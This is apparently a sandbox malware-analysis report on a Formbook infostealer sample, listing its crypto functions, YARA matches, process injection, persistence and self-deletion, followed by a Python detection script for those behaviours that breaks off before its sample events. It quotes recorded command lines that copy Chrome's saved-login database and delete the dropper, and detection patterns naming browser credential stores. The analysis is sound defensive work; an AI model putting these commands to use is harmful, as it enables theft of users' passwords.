Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_004F6376 NtSetInformationThread,26_2_004F6376
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_004F5DB6 NtSetInformationThread,26_2_004F5DB6
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_004F5E4B NtSetInformationThread,26_2_004F5E4B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_004F5EF5 NtSetInformationThread,26_2_004F5EF5
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_004F5F8E NtSetInformationThread,26_2_004F5F8E
Detected potential crypto function
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F53FB4026_2_1F53FB40
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F543B4026_2_1F543B40
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F533BD026_2_1F533BD0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5D5AF226_2_1F5D5AF2
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5E1A9926_2_1F5E1A99
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F54594B26_2_1F54594B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F56990626_2_1F569906
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5999C026_2_1F5999C0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5E19E226_2_1F5E19E2
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5ED9BE26_2_1F5ED9BE
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F54981026_2_1F549810
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5C18B626_2_1F5C18B6
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5E174626_2_1F5E1746
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5D776426_2_1F5D7764
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F53579026_2_1F535790
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F53764026_2_1F537640
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F51963026_2_1F519630
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5D951A26_2_1F5D951A
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F53153026_2_1F531530
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5DD5D226_2_1F5DD5D2
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5D544C26_2_1F5D544C
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F54547E26_2_1F54547E
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F53141026_2_1F531410
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F52740C26_2_1F52740C
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5CF42B26_2_1F5CF42B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F59B49026_2_1F59B490
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5D349026_2_1F5D3490
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F56D34026_2_1F56D340
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5BB34026_2_1F5BB340
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F56531D26_2_1F56531D
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F4F331426_2_1F4F3314
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5433B426_2_1F5433B4
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F54523D26_2_1F54523D
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F53911026_2_1F539110
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F54711026_2_1F547110
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5D71DD26_2_1F5D71DD
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F52B1B026_2_1F52B1B0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F54107026_2_1F541070
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5DD01626_2_1F5DD016
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5910CF26_2_1F5910CF
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5A8F3226_2_1F5A8F32
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5C4FE026_2_1F5C4FE0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5C0F9F26_2_1F5C0F9F
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5A6E4026_2_1F5A6E40
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F544E6126_2_1F544E61
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5DCE6626_2_1F5DCE66
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5A4E2026_2_1F5A4E20
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F56CED026_2_1F56CED0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F510D4026_2_1F510D40
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F550D6F26_2_1F550D6F
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F520CF526_2_1F520CF5
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5E2C9A26_2_1F5E2C9A
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5ACC8B26_2_1F5ACC8B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F538B0026_2_1F538B00
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F51EBE026_2_1F51EBE0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F544B9626_2_1F544B96
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F544A5B26_2_1F544A5B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5C8A4926_2_1F5C8A49
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5D0A0226_2_1F5D0A02
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55C87C26_2_1F55C87C
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F59A86026_2_1F59A860
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5448CB26_2_1F5448CB
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5E28E826_2_1F5E28E8
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5B68E026_2_1F5B68E0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F54289026_2_1F542890
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5188B026_2_1F5188B0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5EC75526_2_1F5EC755
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F53874026_2_1F538740
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5167D026_2_1F5167D0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5D278226_2_1F5D2782
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5DC67726_2_1F5DC677
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F54661126_2_1F546611
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5E26F826_2_1F5E26F8
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5E251926_2_1F5E2519
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5BC53F26_2_1F5BC53F
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5BE58A26_2_1F5BE58A
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5DE58126_2_1F5DE581
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5A645026_2_1F5A6450
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F59844826_2_1F598448
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5D44EF26_2_1F5D44EF
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5D833626_2_1F5D8336
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5463C226_2_1F5463C2
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5EE21426_2_1F5EE214
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5E22DD26_2_1F5E22DD
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5342B026_2_1F5342B0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5D61DF26_2_1F5D61DF
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5CE1FF26_2_1F5CE1FF
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5CC1F026_2_1F5CC1F0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5381E026_2_1F5381E0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F54618026_2_1F546180
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5BA06026_2_1F5BA060
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5C606026_2_1F5C6060
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F54E02026_2_1F54E020
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F54002126_2_1F540021
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5240CC26_2_1F5240CC
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F52A08026_2_1F52A080
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_004F2BF226_2_004F2BF2
Found potential string decryption / allocating functions
Source: C:\Users\user\subfolder1\filename1.exe  Code function: String function: 1F51B0E0 appears 264 times
Source: C:\Users\user\subfolder1\filename1.exe  Code function: String function: 1F55C840 appears 53 times
Source: C:\Users\user\subfolder1\filename1.exe  Code function: String function: 1F3DB0E0 appears 176 times
Source: C:\Users\user\subfolder1\filename1.exe  Code function: String function: 1F595110 appears 81 times
Source: C:\Users\user\subfolder1\filename1.exe  Code function: String function: 1F50B0E0 appears 228 times
Source: C:\Users\user\subfolder1\filename1.exe  Code function: String function: 1F55DDE8 appears 64 times
Source: C:\Users\user\subfolder1\filename1.exe  Code function: String function: 1F455110 appears 48 times
Source: C:\Users\user\subfolder1\filename1.exe  Code function: String function: 1F41DDE8 appears 49 times
Source: C:\Users\user\subfolder1\filename1.exe  Code function: String function: 1F56DDE8 appears 99 times
Source: C:\Users\user\subfolder1\filename1.exe  Code function: String function: 1F584F10 appears 39 times
Source: C:\Users\user\subfolder1\filename1.exe  Code function: String function: 1F465110 appears 40 times
Source: C:\Users\user\subfolder1\filename1.exe  Code function: String function: 1F42DDE8 appears 49 times
Source: C:\Users\user\subfolder1\filename1.exe  Code function: String function: 1F56DE44 appears 46 times
Source: C:\Users\user\subfolder1\filename1.exe  Code function: String function: 1F594F10 appears 80 times
Source: C:\Users\user\subfolder1\filename1.exe  Code function: String function: 1F5A5110 appears 95 times
Source: C:\Users\user\subfolder1\filename1.exe  Code function: String function: 1F3CB0E0 appears 176 times
PE file contains strange resources
Source: #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe  Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe, 00000000.00000002.772452885.0000000000418000.00000002.00020000.sdmp  Binary or memory string: OriginalFilenameClockosci4.exe vs #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe
Source: #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe, 00000001.00000002.778986842.0000000002378000.00000004.00000001.sdmp  Binary or memory string: OriginalFilenameClockosci4.exe vs #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe
Source: #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe, 00000001.00000002.786678620.000000001E990000.00000002.00000001.sdmp  Binary or memory string: originalfilename vs #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe
Source: #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe, 00000001.00000002.786678620.000000001E990000.00000002.00000001.sdmp  Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe
Source: #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe, 00000001.00000002.786337136.000000001E890000.00000002.00000001.sdmp  Binary or memory string: System.OriginalFileName vs #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe
Source: #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe  Binary or memory string: OriginalFilenameClockosci4.exe vs #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe
Searches the installation path of Mozilla Firefox
Source: C:\Windows\SysWOW64\NETSTAT.EXE  Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
Yara signature match
Source: 00000005.00000002.936093552.000000001F170000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.936093552.000000001F170000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.896346552.000000001F170000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.896346552.000000001F170000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.931730236.00000000000A0000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.931730236.00000000000A0000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001A.00000002.1277253347.0000000000060000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001A.00000002.1277253347.0000000000060000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001A.00000002.1282450545.000000001F2B0000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001A.00000002.1282450545.000000001F2B0000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.890369559.00000000000A0000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.890369559.00000000000A0000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.901044828.000000000D3B2000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.914336084.0000000000060000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.914336084.0000000000060000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.922687997.000000001F2B0000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.922687997.000000001F2B0000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Classification label
Source: classification engine  Classification label: mal100.rans.troj.spyw.evad.winEXE@35/12@49/5
Creates files inside the user directory
Source: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe  File created: C:\Users\user\subfolder1
Creates mutexes
Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4480:120:WilError_01
Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3148:120:WilError_01
Creates temporary files
Source: C:\Windows\explorer.exe  File created: C:\Users\user\AppData\Local\Temp\T7nhhu
Executes visual basic scripts
Source: unknown  Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\subfolder1\filename1.vbs'
PE file has an executable .text section and no other executable section
Source: #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe  Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this application use the VB 6.0 runtime library (probably coded in Visual Basic)
Source: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe  Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\subfolder1\filename1.exe  Section loaded: C:\Windows\SysWOW64\msvbvm60.dll  (4 instances)
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exe  Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Reads ini files
Source: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe  File read: C:\Users\user\Desktop\desktop.ini
Reads software policies
Source: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file
Source: C:\Users\user\subfolder1\filename1.exe  File read: C:\Windows\System32\drivers\etc\hosts  (16 instances)
Source: C:\Windows\explorer.exe  File read: C:\Windows\System32\drivers\etc\hosts  (2 instances)
Source: C:\Windows\SysWOW64\NETSTAT.EXE  File read: C:\Windows\System32\drivers\etc\hosts
Sample is known by Antivirus
Source: #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe  Virustotal: Detection: 26%
Source: #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe  ReversingLabs: Detection: 38%
Sample reads its own file content
Source: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe  File read: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe
Spawns processes
Source: unknown  Process created: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe 'C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe'
Source: unknown  Process created: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe 'C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe'
Source: unknown  Process created: C:\Users\user\subfolder1\filename1.exe 'C:\Users\user\subfolder1\filename1.exe'
Source: unknown  Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\subfolder1\filename1.vbs'
Source: unknown  Process created: C:\Users\user\subfolder1\filename1.exe C:\Users\user\subfolder1\filename1.exe
Source: unknown  Process created: C:\Users\user\subfolder1\filename1.exe 'C:\Users\user\subfolder1\filename1.exe'
Source: unknown  Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\subfolder1\filename1.vbs'
Source: unknown  Process created: C:\Users\user\subfolder1\filename1.exe C:\Users\user\subfolder1\filename1.exe
Source: unknown  Process created: C:\Users\user\subfolder1\filename1.exe C:\Users\user\subfolder1\filename1.exe
Source: unknown  Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: unknown  Process created: C:\Users\user\subfolder1\filename1.exe C:\Users\user\subfolder1\filename1.exe
Source: unknown  Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\subfolder1\filename1.exe'
Source: unknown  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown  Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
Source: unknown  Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: unknown  Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: unknown  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown  Process created: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exe C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exe
Source: unknown  Process created: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exe C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exe
Source: unknown  Process created: C:\Users\user\subfolder1\filename1.exe 'C:\Users\user\subfolder1\filename1.exe'
Source: unknown  Process created: C:\Users\user\subfolder1\filename1.exe 'C:\Users\user\subfolder1\filename1.exe'
Source: unknown  Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe  Process created: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe 'C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe'
Source: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe  Process created: C:\Users\user\subfolder1\filename1.exe 'C:\Users\user\subfolder1\filename1.exe'
Source: C:\Users\user\subfolder1\filename1.exe  Process created: C:\Users\user\subfolder1\filename1.exe 'C:\Users\user\subfolder1\filename1.exe'
Source: C:\Windows\System32\wscript.exe  Process created: C:\Users\user\subfolder1\filename1.exe C:\Users\user\subfolder1\filename1.exe
Source: C:\Users\user\subfolder1\filename1.exe  Process created: C:\Users\user\subfolder1\filename1.exe C:\Users\user\subfolder1\filename1.exe
Source: C:\Windows\explorer.exe  Process created: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exe C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exe
Source: C:\Windows\System32\wscript.exe  Process created: C:\Users\user\subfolder1\filename1.exe C:\Users\user\subfolder1\filename1.exe
Source: C:\Users\user\subfolder1\filename1.exe  Process created: C:\Users\user\subfolder1\filename1.exe C:\Users\user\subfolder1\filename1.exe
Source: C:\Windows\SysWOW64\NETSTAT.EXE  Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\subfolder1\filename1.exe'
Source: C:\Windows\SysWOW64\NETSTAT.EXE  Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exe  Process created: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exe C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exe
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exe  Process created: C:\Users\user\subfolder1\filename1.exe 'C:\Users\user\subfolder1\filename1.exe'
Source: C:\Users\user\subfolder1\filename1.exe  Process created: C:\Users\user\subfolder1\filename1.exe 'C:\Users\user\subfolder1\filename1.exe'
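The parent/child pairs above are the most directly usable part of this report for detection: an injected copy of NETSTAT.EXE spawns cmd.exe to copy Chrome's Login Data to %TEMP%\DB1 and to delete the dropper, and wscript.exe relaunches filename1.exe from the user profile. The following is an added example and not part of the Joe Sandbox report: Python detection logic run over constructed process-creation events that mirror the command lines listed above. The event field names (parent_image, image, command_line) and the rule names are assumptions, not any vendor's schema.

```python
"""Flag the process-chain behaviour seen in this report in process-creation
events. Added example, not part of the sandbox report: the event records are
constructed from the command lines the report lists, and the field names
(parent_image, image, command_line) are an assumed schema."""
import re
from typing import Dict, List, Tuple

# Windows binaries this sample injects into; none of them has a legitimate
# reason to spawn a shell.
INJECT_TARGETS = {"netstat.exe", "colorcpl.exe", "cmmon32.exe", "systray.exe"}

# Browser credential stores whose copy to another location is a theft step.
CRED_STORE_RE = re.compile(r"\\(login data|logins\.json|key4\.db)", re.I)
# "cmd /c del <path under the user profile>": the dropper removing itself.
SELF_DELETE_RE = re.compile(r"/c\s+del\s+['\"]?[a-z]:\\users\\", re.I)


def basename(path: str) -> str:
    """Lower-cased final path component, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule that fires on one event."""
    parent = basename(event["parent_image"])
    image = basename(event["image"])
    cmd = event["command_line"]
    hits: List[str] = []
    if parent in INJECT_TARGETS and image == "cmd.exe":
        hits.append("system_binary_spawns_cmd")
    if image == "cmd.exe" and re.search(r"\bcopy\b", cmd, re.I) and CRED_STORE_RE.search(cmd):
        hits.append("browser_credential_store_copied")
    if image == "cmd.exe" and SELF_DELETE_RE.search(cmd):
        hits.append("dropper_self_delete")
    # Script host launching an executable out of the user profile: the
    # persistence path in this report (filename1.vbs -> filename1.exe).
    if parent == "wscript.exe" and image.endswith(".exe") and "\\users\\" in event["image"].lower():
        hits.append("wscript_launches_user_exe")
    return hits


def scan(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """(rule, command line) for every hit, in event order."""
    return [(rule, e["command_line"]) for e in events for rule in classify(e)]


# Constructed sample events mirroring the report's process tree.
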